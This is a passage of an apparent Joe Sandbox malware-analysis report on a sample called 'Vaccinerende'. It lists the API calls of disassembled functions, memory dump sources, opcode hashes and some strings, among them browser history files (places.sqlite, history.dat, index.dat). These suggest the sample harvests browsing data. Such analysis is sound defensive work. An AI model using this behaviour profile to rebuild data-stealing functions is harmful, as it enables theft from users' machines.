                                                                              • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                              APIs
                                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                              • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                              • String ID:
                                                                              • API String ID: 1979745280-0
                                                                              • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                              • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                              APIs
                                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                              • free.MSVCRT ref: 00418803
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                              • String ID:
                                                                              • API String ID: 1355100292-0
                                                                              • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                              • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                              APIs
                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                              • memset.MSVCRT ref: 00403A55
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                              • String ID: history.dat$places.sqlite
                                                                              • API String ID: 2641622041-467022611
                                                                              • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                              • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                              APIs
                                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                              • GetLastError.KERNEL32 ref: 00417627
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$File$PointerRead
                                                                              • String ID:
                                                                              • API String ID: 839530781-0
                                                                              • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                              • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID: *.*$index.dat
                                                                              • API String ID: 1974802433-2863569691
                                                                              • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                              • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FilePointer
                                                                              • String ID:
                                                                              • API String ID: 1156039329-0
                                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseCreateHandleTime
                                                                              • String ID:
                                                                              • API String ID: 3397143404-0
                                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                              APIs
                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                                              • String ID:
                                                                              • API String ID: 1125800050-0
                                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleSleep
                                                                              • String ID: }A
                                                                              • API String ID: 252777609-2138825249
                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                              APIs
                                                                              • malloc.MSVCRT ref: 00409A10
                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                              • free.MSVCRT ref: 00409A31
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: freemallocmemcpy
                                                                              • String ID:
                                                                              • API String ID: 3056473165-0
                                                                              • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                              • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset
                                                                              • String ID: BINARY
                                                                              • API String ID: 2221118986-907554435
                                                                              • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                              • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp
                                                                              • String ID: /stext
                                                                              • API String ID: 2081463915-3817206916
                                                                              • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                              • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                              APIs
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0040957A
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$??2@CloseCreateHandleReadSize
                                                                              • String ID:
                                                                              • API String ID: 1023896661-0
                                                                              • Opcode ID: 6ed92b0bd968f8c5d07b599056bf9567f50ecade68025785c49dbe497b9d775a
                                                                              • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                              • Opcode Fuzzy Hash: 6ed92b0bd968f8c5d07b599056bf9567f50ecade68025785c49dbe497b9d775a
                                                                              • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                              APIs
                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                              • CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                              • String ID:
                                                                              • API String ID: 2445788494-0
                                                                              • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                              • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcmpmemset
                                                                              • String ID:
                                                                              • API String ID: 1065087418-0
                                                                              • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                              • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                              APIs
                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                              • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00410654
                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                              • String ID:
                                                                              • API String ID: 1381354015-0
                                                                              • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                              • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: free
                                                                              • String ID:
                                                                              • API String ID: 1294909896-0
                                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                              • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
